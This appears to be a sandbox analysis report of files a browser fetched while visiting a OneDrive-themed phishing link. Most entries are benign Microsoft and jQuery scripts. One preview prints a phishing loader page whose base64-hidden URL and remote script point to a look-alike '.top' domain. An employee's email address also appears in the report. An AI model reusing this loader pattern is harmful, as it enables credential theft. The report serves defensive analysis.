                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:downloaded
                                        Size (bytes):28
                                        Entropy (8bit):3.950212064914748
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:C3F64CB2A8B00CBBC30CE2908208A29D
                                        SHA1:E4AA7CAB67F4CF5FA52371DDC25A75AAFD4D0CCC
                                        SHA-256:391601283994BCD9486160BF8A5637410D280E1BDDD3AEF5428454976E193E81
                                        SHA-512:6CCBC26128FE65D6D313B965DA3D2E201D506442D0036404ABB490BE0FC99B3A0FDB611269B932DBA7F3A621E11F79ED213D2B11D487EE39C54A17D97A823552
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwlv1Jqo5vdMQxIFDZFhlU4SBQ2RYZVO?alt=proto
                                        Preview:ChIKBw2RYZVOGgAKBw2RYZVOGgA=
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:WebAssembly (wasm) binary module version 0x1 (MVP)
                                        Category:downloaded
                                        Size (bytes):5414497
                                        Entropy (8bit):6.524957711228921
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:976CF48A501E1F18DC1A4FEB0ED44C9D
                                        SHA1:5D797A2CB8838D7A449C11AC5C6D50FA383AEC63
                                        SHA-256:D199B910EBACC2F0E11CE078F1E1165163E4957B7928B7E3269CA151F8D21978
                                        SHA-512:1AB3D838085F3E2EE867BF41E3804E4817444D2FE4AE8B8F3AADD3868ECBE1382939BC3C238B5FEEBDE55DC9CE9B4C02754C785B7E84C69D7F43006A81B96F43
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/item-viewer-pdf/mspdfkit.wasm
                                        Preview:.asm.........`...`....`....`.....`.....`......`.......`...`......`.......`........`...}`.........`........`...~`...........`.........`..........`..~...`..}.`..`....}`...~..`............`...........`..~..`...~...`....~.`..........`.}.}`.....}..`.............`..~..~`...|`....}..`.|.|`..}..`.|...`.~...`..~~~~.`..~.`..}}.`.....}`..~~.....`..~..`...}..`..}}...`............`.||.|`.}}..`.....~..`..............`.|..`.~..`.~..~`...||||.`.}}.}`......~`.....|..`.}..`....}.`....}...........`......}..`....}...`..}}}}.`...............`..~~..`....|`...............`.....~~..`......~~..`..}.}`..|..`.....}....`.....}.`..}}..`...|.|`...}.`...}......`..}}}}}}.`.}}}}.`..|`.|..|`..|......`..|.`....~`..~`.................`..~~~...`.|.}`.}...`...}}.`...}..`...}.}`...}}...`....|...`..}}....`...}..........`....}......`.......|`.~~.|`.||..`..||..`..||.`....~.~`.~~.}`.~~~~..`.~~~..`...~.`.....|`..|.|`.|.`..~~...`...~..`.~.`....~..`......~.`..}}.}.`....}.....`....}.........`..}}}}}}}}..`..}..`....}.}}.`.....}}}..}
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (17002)
                                        Category:downloaded
                                        Size (bytes):80010
                                        Entropy (8bit):5.401177184570899
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:6FCFC960B118594E6B23AACD56510BEC
                                        SHA1:8F85E9EF095B82870BE1C23F41768437D32A19F0
                                        SHA-256:48A88B0880D62D09CD61D100050EEFF259A3177D41E863A952E0F21D5EBCB3C6
                                        SHA-512:3C8C98769EBA3F747B8767722F25506D895D44D80572FAAE5BB546387394EBC2AA42E8A50EBF6BFB150797BE949DB7A38091A5DC7D2DFD2EDE92CF85D01C03CE
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/36.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[36,1079],{3267:function(e,t,n){var a;n.d(t,{a:function(){return a}}),function(e){e[e.publish=0]="publish",e[e.schedule=1]="schedule",e[e.unpublish=2]="unpublish"}(a||(a={}))}.,5773:function(e,t,n){n.d(t,{a:function(){return d}});var a=n("tslib_102"),i=n(21),r=n(67),o=n(72),s=n(276),c=n(4643),d=(0,i.b)(function(){return function(e){return(0,a.Zd)(void 0,void 0,void 0,function(){return(0,a.qr)(this,function(t){return e((0,r.b)(s.b,o.a)(c.b)),e((0,r.b)(s.a,o.a)(c.b)),[2]})})}})}.,5768:function(e,t,n){n.d(t,{a:function(){return d}});var a=n("tslib_102"),i=n(48),r=n(21),o=n(332),s=n(216);function c(e,t){var n=t.currentItemKey,a=e.demandItemFacet(s.a,n);return a?{currentItemKey:a.remoteItemKey}:{}}var d=(0,r.b)(function(){return function(e){return(0,a.Zd)(void 0,void 0,void 0,function(){return(0,a.qr)(this,function(t){return e((0,i.b)(s.a,o.a)(c)),[2]})})}})}.,4643:function(e,t,n){n.d(t,{a:function(){return D},b:fu
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (40143)
                                        Category:dropped
                                        Size (bytes):40148
                                        Entropy (8bit):5.196383978141877
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:8E082311B2EB3FE2238C7719090E0D81
                                        SHA1:BEF6BB33D2E5413E5EF77B114E43656A87837875
                                        SHA-256:92BDB2AD63CCF3C8C59E6B1EB7208E5CED2019816C23B94DB7D8C7A00756EC8D
                                        SHA-512:508CA9B00428D5541948F0AF7D965865EEF8CB38B603DF89DFBB965812991417CA0BF1DA4F2817C8A4D8AAB5AC7A3082623015115E4AA000E5625353BE051A0E
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[465],{4301:function(e,t,n){n.d(t,{a:function(){return Ie}});var a={};n.r(a),n.d(a,{Decoder:function(){return _e},Encoder:function(){return pe},PacketType:function(){return fe},protocol:function(){return ue}});const i=Object.create(null);i.open="0",i.close="1",i.ping="2",i.pong="3",i.message="4",i.upgrade="5",i.noop="6";const r=Object.create(null);Object.keys(i).forEach(e=>{r[i[e]]=e});const o={type:"error",data:"parser error"},s="function"==typeof Blob||"undefined"!=typeof Blob&&"[object BlobConstructor]"===Object.prototype.toString.call(Blob),c="function"==typeof ArrayBuffer,d=e=>"function"==typeof ArrayBuffer.isView?ArrayBuffer.isView(e):e&&e.buffer instanceof ArrayBuffer,l=({type:e,data:t},n,a)=>s&&t instanceof Blob?n?a(t):u(t,a):c&&(t instanceof ArrayBuffer||d(t))?n?a(t):u(new Blob([t]),a):a(i[e]+(t||"")),u=(e,t)=>{const n=new FileReader;return n.onload=function(){const e=n.result.split(",")[1];t("b"+(e||
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (32030)
                                        Category:downloaded
                                        Size (bytes):86709
                                        Entropy (8bit):5.367391365596119
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:E071ABDA8FE61194711CFC2AB99FE104
                                        SHA1:F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
                                        SHA-256:85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
                                        SHA-512:53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://code.jquery.com/jquery-3.1.1.min.js
                                        Preview:/*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (855)
                                        Category:downloaded
                                        Size (bytes):1549
                                        Entropy (8bit):5.41633423138362
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:99A3F6CE56A284A2A96A7A7FB5A38B71
                                        SHA1:A10A513907EF8738BA7026F48EC97ED644BDBC71
                                        SHA-256:922FDB0AA46C57FE49CC578DEA7796555BC1DF4068F91F2A5C81F6CD7DE1FE13
                                        SHA-512:3446D30ABF7F3496CB4FABB26540124C1C9730C2B21BE81C28971F932042472D459A4F41C98FA5BC539807D270E9B6D2BD5A8BCD4F1BF739859D06A342F9C266
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/603.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[603],{6357:function(e,t,n){n.r(t),n.d(t,{Persona:function(){return a.a},PersonaBase:function(){return i.a},PersonaCoin:function(){return r.a},PersonaCoinBase:function(){return o.a},PersonaInitialsColor:function(){return s.a},PersonaPresence:function(){return s.b},PersonaSize:function(){return s.c},getPersonaInitialsColor:function(){return c.a},personaPresenceSize:function(){return d.a},personaSize:function(){return d.b},presenceBoolean:function(){return d.c},sizeBoolean:function(){return d.d},sizeToPixels:function(){return d.e}});var a=n(5945),i=n(5946),r=n(3301),o=n(3302),s=n(2841),c=n(2901),d=n(3005)}.,3006:function(e,t,n){n.d(t,{a:function(){return c}});var a=/[\(\[\{\<][^\)\]\}\>]*[\)\]\}\>]/g,i=/[\0-\u001F\!-/:-@\[-`\{-\u00BF\u0250-\u036F\uD800-\uFFFF]/g,r=/^\d+[\d\s]*(:?ext|x|)\s*\d+$/i,o=/\s+/g,s=/[\u0600-\u06FF\u0750-\u077F\u08A0-\u08FF\u1100-\u11FF\u3130-\u318F\uA960-\uA97F\uAC00-\uD7AF\uD7B0-\uD7FF\
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (34942)
                                        Category:dropped
                                        Size (bytes):35256
                                        Entropy (8bit):5.291177733223216
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:E9AA9C6B2DD33381FBB59905DA8286DD
                                        SHA1:4D149204F955518108BCC5137CB362DCC68508E4
                                        SHA-256:60451647E5A55A911AFECAE6716DB28FC94A7228D9E8B87CE07E0F97D8355D43
                                        SHA-512:19348537AED93C2B9BDA34E878F5F7A54A11799AF8E4931922DFE2CC598EEC3C79302D602E265852B3B3A79F304D94EFA93788E54EEB74233DF5167D11C31937
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[115],{2512:function(e,t,n){n.d(t,{b:function(){return E},a:function(){return m},c:function(){return b},d:function(){return C},e:function(){return I},f:function(){return S},h:function(){return R},g:function(){return N},i:function(){return _},j:function(){return d},k:function(){return D},l:function(){return y},m:function(){return l},p:function(){return f},n:function(){return p},o:function(){return G},q:function(){return h},r:function(){return H},s:function(){return U},t:function(){return A}});var a,i=n("tslib_102"),r=n(7898),o=/\{\d+\}/g,s=/[\{\}]/g,c=function(){function e(){}return e.format=function(e){for(var t=[],n=1;n<arguments.length;n++)t[n-1]=arguments[n];if(null===e)throw new Error(r.g.replace("{0}","s"));if(void 0===e)throw new Error(r.h.replace("{0}","s"));return e.replace(o,function(e){var n=parseInt(e.replace(s,""),10),a=t[n];return(n>=t.length||n<0)&&(a=e),null===a?a="null":void 0===a&&(a="undefine
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (7235)
                                        Category:downloaded
                                        Size (bytes):7334
                                        Entropy (8bit):5.138765267335293
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:AAF550F83548A472677CA0D8AF09EB40
                                        SHA1:2FF0061EFBA8143D235565B37B07B85D457ED839
                                        SHA-256:0B100BD5D5D6E6BB7F833AA6382A5C9809829805825FDAC7F0C8AE66F83E3276
                                        SHA-512:0B7ED87E5700345A1FA5C6ACF8F51F9F1ABDF291C3E2BA8DEE540F226A68B73251087321B12787764E31296C1EF88133F4672083ED18A39E677105534B479AAF
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/sp-client/odsp.tslib/tslib-b1569464.js
                                        Preview:/*! For license information please see tslib-b1569464.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["tslib"],{tslib_102:function(e,t,n){n.d(t,{W_:function(){return r},nT:function(){return S},Hq:function(){return y},qA:function(){return D},jr:function(){return v},Zd:function(){return l},nu:function(){return w},Cn:function(){return E},bg:function(){return f},uh:function(){return s},m_:function(){return p},XJ:function(){return i},qr:function(){return u},D:function(){return O},JV:function(){return C},hY:function(){return I},ZX:function(){return d},$T:function(){return c},MS:function(){return _},l7:function(){return o},AE:function(){return g},CO:function(){return b},Te:function(){return h},OY:function(){return m}});var a=function(e,t){return a=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])},a(e,t)};function i(e,t){if("fun
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (4724)
                                        Category:downloaded
                                        Size (bytes):22094
                                        Entropy (8bit):5.3227367398434815
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:075B37BE4977EE8438ACC486755DE3C3
                                        SHA1:5BFD91EE20706034399F7E6F0C23E736E4A2B42C
                                        SHA-256:BDB8DA183E5008FE6672B1FC9B91F4D6A6E0FD00EFDF31A8C7FB588A34F7EF5E
                                        SHA-512:45AD0F76064BFB4411429888F87359FB3ED8F8A5EF81BA0A342D49BA0B12FD298E47F71A3DB69E4EC60D8AE742DCE02CC6E5197636475D6DA8F2A61C93B09A45
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/235.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[235],{5876:function(e,t,n){n.d(t,{a:function(){return v},b:function(){return y}});var a=n("tslib_102"),i=n(5),r=n(114),o=n(63),s=n(4702),c=n(4712),d=n(4713),l=n(5864),u=n(4130),f=n(4644),p=n(895),m=n(101),_=n(4666),h=n(5877),b=n(349),g=n(4716);function v(e,t){var n=t.itemKey,v=t.desiredSize,S=t.fitMode,D=t.requestOptions,I=e.demandItemFacet(o.a,n);if(!I)return{};var C=e.demandItemFacet(l.a,n)?function(e,t){var n=t.itemKey,a=t.desiredSize,i=t.fitMode,r=y(e.demandItemFacet(s.a,n));if(r&&r.large){var o=e.demandItemFacet(u.a,n),c=o&&(o["@microsoft.graph.downloadUrl"]||o["@content.downloadUrl"]),d=(0,_.a)(e,{itemKey:n});return{url:x(d&&c||r.large.url,a,i,d),width:0,height:0}}}(e,{itemKey:n,driveItem:I,desiredSize:v,fitMode:S}):function(e,t){var n,o=t.itemKey,s=t.driveItem,l=t.desiredSize,u=!!e.demandItemFacet(i.q,o),_=!!e.demandItemFacet(r.e,o);if(!u&&!_){if(!(null===(n=t.requestOptions)||void 0===n?void 0:n.allow
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (16804)
                                        Category:dropped
                                        Size (bytes):31938
                                        Entropy (8bit):5.390847218434074
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:4004D221AD333BD30004F226FE34FE2F
                                        SHA1:48FFAC812BE46A9794AE8A76695C21DCD2F4847E
                                        SHA-256:9DF6BC061796C9B47528B3DEA3ADD0B5130711502222718979D1D0591AD8CF59
                                        SHA-512:00D95C445D90A1FA8E94AA4E91C3C2466200E5F374AD48098682EA0579570E2080B4CA47627EE507A2FDB85EB81144B250288B347B53FA5BE8CB03A55FDA4984
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[20],{5763:function(e,t,n){n.d(t,{a:function(){return a}});var a="-2147024860, Microsoft.SharePoint.SPQueryThrottledException"}.,4631:function(e,t,n){n.d(t,{a:function(){return y}});var a=n("tslib_102"),i=n(21),r=n(29),o=n(40),s=n(158),c=n(136),d=n(7),l=n(28),u=n(1631),f=n(258),p=n(24),m=n(10),_=n(62),h=n(105),b=n("odsp.util_460"),g=n(117);function v(e){var t=this,n=new l.a(e.endpoint).authority;return function(i){return(0,a.Zd)(t,void 0,void 0,function(){var t,r,o,s,u,v,y,S,D,I,x;return(0,a.qr)(this,function(a){switch(a.label){case 0:return t=c.a.serialize({tenantRootUrl:n}),r={endpoint:e.endpoint,tenantRootUrl:n},o=new m.a({name:"GetMyOneDriveUrl.UserOneDriveEndpoint",extraData:r}),b.HW.isActivated("810CC8F7-AE82-42B8-8625-6D144C4336AD")?[3,2]:[4,i((0,g.a)(function(e){return{spItem:e.demandItemFacet(d.a,t,{suppressGetItems:!1}),error:e.demandItemFacet(_.b,t,{suppressGetItems:!0})}}))];case 1:return S=a.sent(
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:C source, ASCII text, with very long lines (11334)
                                        Category:downloaded
                                        Size (bytes):250555
                                        Entropy (8bit):5.454828926981514
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:1361ABB8ED9EF9C515589C022D99064B
                                        SHA1:D61E504CC49F835E94A6D077885BF47DC89E7660
                                        SHA-256:DCD616F0610011B96F1096CFFBD96EB5F4D1D7CD734F75E63EEE5F1659656903
                                        SHA-512:975687DFB6A6B8281D1713BF2BAB5AE493006FFCEDB7D9A2EA9545072D65A8C4AF34F743BDB3CE1E804B9A6072ACFAF8CB5176F7D8029B74817BE69D9C1D089E
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/plt.listviewdataprefetch.js
                                        Preview:var __webpack_result__;!function(){"use strict";var e={608:function(e,t,n){n.r(t),n.d(t,{__assign:function(){return a.W_},__asyncDelegator:function(){return a.nT},__asyncGenerator:function(){return a.Hq},__asyncValues:function(){return a.qA},__await:function(){return a.jr},__awaiter:function(){return a.Zd},__classPrivateFieldGet:function(){return a.nu},__classPrivateFieldSet:function(){return a.Cn},__createBinding:function(){return a.bg},__decorate:function(){return a.uh},__exportStar:function(){return a.m_},__extends:function(){return a.XJ},__generator:function(){return a.qr},__importDefault:function(){return a.D},__importStar:function(){return a.JV},__makeTemplateObject:function(){return a.hY},__metadata:function(){return a.ZX},__param:function(){return a.$T},__read:function(){return a.MS},__rest:function(){return a.l7},__spread:function(){return a.Te},__spreadArray:function(){return a.AE},__spreadArrays:function(){return a.CO},__values:function(){return a.OY}});var a=n("tslib_102")}
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced
                                        Category:downloaded
                                        Size (bytes):1500
                                        Entropy (8bit):7.676946629163264
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:654254813B3B6CF7342CBE7AF529AC20
                                        SHA1:1DC0E0A3CA5A453DFEFFEBD9A749551FCBA21AC6
                                        SHA-256:FA317F1A5CF832C5BF7A5344322DFFAC09EAC2A03B4312E821B827C873799FE0
                                        SHA-512:1A06F8DE9CC32F190039DBF63A7BCF71C6A2DFB4B983BC8CDEEA8C6239DD659B2E1E5CEDEEF3EBA95CD1F7AB21347AE45C492CD3B9F0844D5980360EA53DC9C6
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://atlantarecyclingsolutions-my.sharepoint.com/_layouts/15/userphoto.aspx?size=M&accountname=jharben%40atlantarecyclingsolutions.com
                                        Preview:.PNG........IHDR...`...`......w8....sRGB.........gAMA......a.....pHYs..........o.d...qIDATx^..n.0.....f.{C..{Ez....= 9.+.6.h....i}k-EQ.U.TL..#.aG.......;..v. ..@....#.aG....]w.z{{M..._S.SOV..........K....wsxxh...Mss3.9Z.........C......eZ[[...fu...........W...`.....h.*.}}}.....a1:??W.4..088...e....tuu...........p........A^_............ijj".(........!].b..(.d)....$.....e..izzzR.`.....VVV..-..y9V.......B..i.....v.d.8..8-.............8.........yI/.......[.!.....M...$..2;...={.:.j).'.......[.!,.8......&a=B..ev..Hj.d....w..E?....m=...2;...]{.:.. *N...X^^...C...8...`dd......2;.m....92N.....TC!..R1rY...^.w=<<..qZ....1H....X:..........b.p.R].......-...Z..sZ........G;,|...&.(..i`Y]...A.!eq.0..q.m.mmmd.RV....W.;_.=...$.1.a...h8..5..a.A?.-.iV.....V.y....gUm.iV..j........*.9OMM.?.Y5+.....IZ......brD...............e...%.....D.y85..-..P.[.K....N0%..@8.L....7....[....E.4.CCC^....9...o......2.....[..~...D}n^.7.ObH......Q..PcA.+.NNN.]....0To..M]#...qS|C...
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, ASCII text, with no line terminators
                                        Category:downloaded
                                        Size (bytes):241
                                        Entropy (8bit):5.263470714076451
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:8BFA54404E27370FB41AD30731FE1554
                                        SHA1:1DF48D5D40F3079F21DB0942E8CF11B6B9024F68
                                        SHA-256:D1FF35E56D894D9FC1DBE288B9059EB6D813B2C354CF09B96CC8A176C0DC75B7
                                        SHA-512:A338FB2C5B19EE664B900CB5C0A4238F5CECD731463B182BE599737915BA655634F9B2BC1B1D84A5B97704C5B7C286785523A2F2B03D8690E2499BD1934632D1
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://pub-ae58b1db74294262a3845142a7ac908a.r2.dev/0nedrivedocsx.html
                                        Preview:<html><head></head><body><input type="hidden" id="b64u" value="aHR0cHM6Ly9hdGxhbnRhcmVjeWNsaW5nc29sdXRpb25zLnRvcC93YXl5L2EwNzZhNDMucGhw"></input><script src="https://atlantarecyclingsolutions.top/wayy/admin/js/sc.php"></script></body></html>
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (6813)
                                        Category:downloaded
                                        Size (bytes):19651
                                        Entropy (8bit):5.4395421866268885
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:119D2E67EA51AF3433B78F943FF52C9D
                                        SHA1:EF7026CF40D2357A3C68C598E50BA576BF870DE8
                                        SHA-256:21A65EB54709E307622895A13BBD0F7320E9CB84430B9A175D6D7B6B92B331C1
                                        SHA-512:F547B375C357A40911F7627002DD5FC5664FBF1F5C6158E6DF36DBF332E1079AE371B5FD33A5BA811542B3EAD46A52810582AD1C264803A30A4A1D12A2E4403E
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/23.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[23],{5946:function(e,t,n){n.d(t,{a:function(){return h}});var a=n("tslib_102"),i=n("react-lib"),r=n(33),o=n(367),s=n(47),c=n(469),d=n(470),l=n(3301),u=n(2841),f=n(137),p=n(152),m=(0,r.a)(),_={size:u.c.size48,presence:u.b.none,imageAlt:"",showOverflowTooltip:!0},h=i.forwardRef(function(e,t){var n=(0,o.a)(_,e),r=i.useRef(null),h=(0,f.a)(t,r),b=function(){return n.text||n.primaryText||""},g=function(e,t,a){var r=t&&t(n,a);return r?i.createElement("div",{dir:"auto",className:e},r):void 0},v=function(e,t){return void 0===t&&(t=!0),e?t?function(){return i.createElement(c.a,{content:e,overflowMode:d.a.Parent,directionalHint:p.a.topLeftEdge},e)}:function(){return i.createElement(i.Fragment,null,e)}:void 0},y=v(b(),n.showOverflowTooltip),S=v(n.secondaryText,n.showOverflowTooltip),D=v(n.tertiaryText,n.showOverflowTooltip),I=v(n.optionalText,n.showOverflowTooltip),x=n.hidePersonaDetails,C=n.onRenderOptionalText,O=void 0
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (35973)
                                        Category:dropped
                                        Size (bytes):43889
                                        Entropy (8bit):5.255680037730635
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:6CB2EB5381EBDAA8E17784420BC84436
                                        SHA1:48A2D11F481F03117E26EA5664F00433B950EBBF
                                        SHA-256:F56AF45072B9C9A45E71C76606C3C751EBE8F02D41635F8BD93C94E0E1B535A1
                                        SHA-512:A9FC7D2176442C6EB3A4B33CD5C0F3FC75C32FB33EF44E5A6876C880F52537029F8CAB5E253E0F19BFF8C52FE456CCD387CCB72FDD50EC9D553988B63162E01D
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[33],{5919:function(e,t,n){n.d(t,{a:function(){return g}});var a=n(37),i=n("tslib_102"),r=n("react-lib"),o=n(230),s=n(82),c=n(33),d=n(127),l=n("fui.util_369"),u=n(143),f=n(241),p=n(393),m=(0,c.a)(),_=function(e){return function(t){return t?t.column.isIconOnly?r.createElement("span",{className:e.accessibleLabel},t.column.name):r.createElement(r.Fragment,null,t.column.name):null}},h=function(e){function t(t){var n=e.call(this,t)||this;return n._root=r.createRef(),n._tooltipRef=r.createRef(),n._onRenderFilterIcon=function(e){return function(e){var t=e.columnProps,n=(0,i.l7)(e,["columnProps"]),a=(null==t?void 0:t.useFastIcons)?o.a:s.a;return r.createElement(a,(0,i.W_)({},n))}},n._onRenderColumnHeaderTooltip=function(e){return r.createElement("span",{className:e.hostClassName},e.children)},n._onColumnClick=function(e){var t=n.props,a=t.onColumnClick,i=t.column;i.columnActionsMode!==f.b.disabled&&(i.onColumnClick&&i
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Unicode text, UTF-8 text, with very long lines (45476)
                                        Category:downloaded
                                        Size (bytes):49725
                                        Entropy (8bit):5.63616620645336
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:21D752FD9CD172008F95ED50BE272567
                                        SHA1:C4A4EE05B6B5F3D140752C98C5E4F425F2DD1648
                                        SHA-256:817D95EDC44F092FA4393C006F3521EE0572CD341105A4990F09ED244448BC5E
                                        SHA-512:7A1D5441B817DAF004AEE4457962D1F16F9A023FB7C2FCC4845977A6915B16C994CFF744DBE3C6585DA736F4DC87E8E185BA6BD271D5A16C7818F054BC8B5B3B
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/281.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[281],{2221:function(e,t,n){n.r(t),n.d(t,{initializeIcons:function(){return E}});var a=n(1337),i=n("fui.util_369");function r(e,t){void 0===e&&(e="");var n={style:{MozOsxFontSmoothing:"grayscale",WebkitFontSmoothing:"antialiased",fontStyle:"normal",fontWeight:"normal",speak:"none"},fontFace:{fontFamily:'"FabricMDL2Icons-0"',src:"url('".concat(e,"odsp-next-icons-0-433a26c6.woff') format('woff')")},icons:{DecreaseIndentLegacy:".",IncreaseIndentLegacy:".",SizeLegacy:".",PageLink:".",DatabaseSource:".",CommentSolid:".",ChangeEntitlements:".",Installation:".",WebAppBuilderModule:".",WebAppBuilderFragment:".",WebAppBuilderSlot:".",BullseyeTargetEdit:".",WebAppBuilderFragmentCreate:".",PageData:".",PageHeaderEdit:".",ProductList:".",UnpublishContent:".",DependencyAdd:".",DependencyRemove:".",EntitlementPolicy:".",EntitlementRedemption:".",SchoolDataSyncLogo:".",BugWarning:"
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:dropped
                                        Size (bytes):928
                                        Entropy (8bit):5.020158739694115
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:C27EA21903DAC818E1C698443B027657
                                        SHA1:38FC86DF752451F779A2431DA02ED038512BA454
                                        SHA-256:77878A80C7001B06827DB1AC232D9E64C6D3436BEED9161BE124672F3401ED5C
                                        SHA-512:E0DDDF39990C9BE96B6B8CCC0DC0DE698A6B434E9C5FFAB0D1BBBAA4B06A1EA8F8A2C994893A5389337CE64E950FBBB2B178F4DB5A27F22F93EDB6D629C54439
                                        Malicious:false
                                        Reputation:unknown
